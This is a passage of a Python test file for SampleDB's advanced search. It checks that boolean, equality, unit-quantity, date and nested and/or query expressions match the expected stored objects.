'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr == True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr == False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True == bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False == bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['bool_attr']['value']
def test_find_by_boolean_attribute_not_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr != True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr != False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True != bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False != bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']


def test_find_by_equal_values(user, action) -> None:
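    """== between two literals (booleans, dates, texts, quantities) matches all objects when true and none when false."""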
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True == True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True == False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 == 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 == 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"Example" == "Example"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"Example" == "Exomple"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm == 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm == 20km', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_unequal_values(user, action) -> None:
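    """!= between two literals matches all objects when true and none when false."""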
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True != True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True != False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 != 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 != 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"Example" != "Example"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"Example" != "Exomple"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm != 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm != 20km', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0


def test_find_by_boolean_attribute_or(user, action) -> None:
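    """or combines a boolean attribute with literals and with other boolean attributes."""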
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or bool_attr2', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
for object in objects:
assert ('bool_attr' in object.data and object.data['bool_attr']['value']) or ('bool_attr2' in object.data and object.data['bool_attr2']['value'])
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or bool_attr3', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert ('bool_attr' in object.data and object.data['bool_attr']['value']) or ('bool_attr3' in object.data and object.data['bool_attr3']['value'])


def test_find_by_boolean_attribute_and(user, action) -> None:
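    """and combines a boolean attribute with literals and with other boolean attributes."""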
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and bool_attr2', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert ('bool_attr' in object.data and object.data['bool_attr']['value']) and ('bool_attr2' in object.data and object.data['bool_attr2']['value'])
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and bool_attr3', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_boolean_boolean_and(user, action) -> None:
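    """and between two boolean literals follows the usual truth table."""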
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_boolean_boolean_or(user, action) -> None:
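    """or between two boolean literals follows the usual truth table."""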
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_boolean_expression_and(user, action) -> None:
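    """and accepts parenthesized boolean subexpressions on either side."""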
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_boolean_expression_or(user, action) -> None:
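    """or accepts parenthesized boolean subexpressions on either side."""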
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_attribute_expression_and(user, action) -> None:
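    """and combines a boolean attribute with a parenthesized expression in either operand order."""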
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) and bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_attribute_expression_or(user, action) -> None:
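    """or combines a boolean attribute with a parenthesized expression in either operand order."""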
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) or bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0


def test_find_by_datetime_attribute_equal(user, action) -> None:
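    """== compares a datetime attribute against a date literal in either operand order."""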
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr == 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr == 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 == datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 == datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_datetime_on(user, action) -> None:
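    """on matches a datetime attribute against a date in either operand order and also works between two date literals."""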
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr on 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr on 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 on datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 on datetime_attr', use_advanced_search=True)
